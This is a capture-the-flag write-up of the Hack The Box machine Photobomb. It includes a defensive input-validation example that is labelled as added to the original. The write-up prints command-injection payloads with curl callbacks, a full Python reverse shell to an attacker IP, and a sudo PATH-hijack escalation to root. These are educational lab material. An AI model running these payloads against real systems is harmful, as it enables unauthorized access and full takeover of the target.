Photobomb HTB writeup

Posted on Sat 11 February 2023 in hackthebox

This is a writeup of the machine Photobomb from Hack The Box. As with all the machines on Hack The Box we start by performing an nmap scan against the machine: nmap -sC -sV -oA nmap/photobomb 10.10.11.182

Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 12:57 EST
Nmap scan report for 10.10.11.182
Host is up (0.028s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.46 seconds

We see only two open ports. SSH on port 22 probably won't be vulnerable, so we take a more in-depth look at HTTP on port 80. There we see nginx, which wants to redirect to http://photobomb.htb/. For this reason we add the following entry to /etc/hosts:

10.10.11.182  photobomb.htb

Printer

http://photobomb.htb/printer asks for credentials, so we have a look at the page source.

function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;

We see that we can log in with user pH0t0 and password b0Mb!. We are presented with a web page where we can select a photo, a file type and a size in pixels. If we intercept the download request with Burp we can try to inject a bash command into one of the parameters.

For this we start a local web server with python3 -m http.server and watch for a request from the target machine. We try the injection in each of the three parameters in turn:

photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg;curl 10.10.14.13:8000&filetype=jpg&dimensions=1x1
photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=jpg&dimensions=1x1;curl 10.10.14.13:8000
photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=jpg;curl 10.10.14.13:8000&dimensions=1x1

Only the request with the injection in filetype produces a callback, so that parameter is vulnerable and we try to get a reverse shell through it.
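As an added example that is not part of the original writeup: a strict allowlist validator for the three parameters of the download request, showing the kind of check that would have rejected the payloads above. The parameter names and value formats come from the requests shown; the parser, the patterns and the convert command line are assumptions, not the real handler.

```python
import re
from urllib.parse import unquote_plus

# Allowlists derived from the request seen above: a .jpg name made of safe
# characters, a known output type, and WIDTHxHEIGHT made of digits only.
PHOTO_RE = re.compile(r"[A-Za-z0-9_-]+\.jpg")
FILETYPE_RE = re.compile(r"jpg|png")
DIMENSIONS_RE = re.compile(r"([1-9][0-9]{0,3})x([1-9][0-9]{0,3})")

class RejectedParameter(ValueError):
    """Raised when a parameter fails its allowlist; .param names it."""
    def __init__(self, param, value):
        super().__init__(f"{param}: rejected {value!r}")
        self.param = param

def parse_body(body):
    """Split an application/x-www-form-urlencoded body on '&' only.
    ';' is deliberately not a separator, so it stays inside the value and is
    caught by the allowlist instead of being silently split off."""
    params = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params

def validate_download(body):
    """Return the three validated parameters or raise RejectedParameter.
    Every value must fully match its pattern before it reaches any process."""
    params = parse_body(body)
    out = {}
    for name, pattern in (("photo", PHOTO_RE), ("filetype", FILETYPE_RE),
                          ("dimensions", DIMENSIONS_RE)):
        values = params.get(name, [])
        if len(values) != 1 or not pattern.fullmatch(values[0]):
            raise RejectedParameter(name, values)
        out[name] = values[0]
    return out

def rejected_parameter(body):
    """Name of the first parameter that fails validation, or None if all pass."""
    try:
        validate_download(body)
    except RejectedParameter as exc:
        return exc.param
    return None

def build_convert_argv(p):
    """Argument vector for the resize step as a list, so no shell ever parses
    the values (the 'convert' command line is an assumption, not the real app)."""
    width, height = DIMENSIONS_RE.fullmatch(p["dimensions"]).groups()
    return ["convert", f"source_images/{p['photo']}", "-resize",
            f"{width}x{height}", f"out.{p['filetype']}"]
```

The argv list is meant for subprocess.run without shell=True, so even a value that slipped past the allowlist would be passed as a single argument rather than interpreted by /bin/sh.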

Reverse shell

For this we first start a listener with nc -lvnp 9001.

Then we use a python3 reverse shell in the filetype parameter:

photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=jpg;python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.13",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'&dimensions=1x1

User flag

With this reverse shell we can read the user flag:

/home/wizard/user.txt
0a8c193770e8af1131b8c7b8bcebe3e2

Privilege escalation

Now let's see whether wizard is allowed to run any commands with sudo without providing a password by executing sudo -l. That is indeed the case.

sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

So let's see what /opt/cleanup.sh does:

. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

The script calls find without an absolute path, so it is resolved through PATH. Because the sudo rule carries the SETENV tag, we are allowed to pass our own PATH to sudo. So we create a script called find in the current directory, prepend that directory to PATH and run /opt/cleanup.sh with sudo to gain a root shell: sudo PATH=.:$PATH /opt/cleanup.sh

Root flag

And with our newly gained root shell we can read the root flag: cat /root/root.txt

3f690bc578906f2e2b602db972314a9b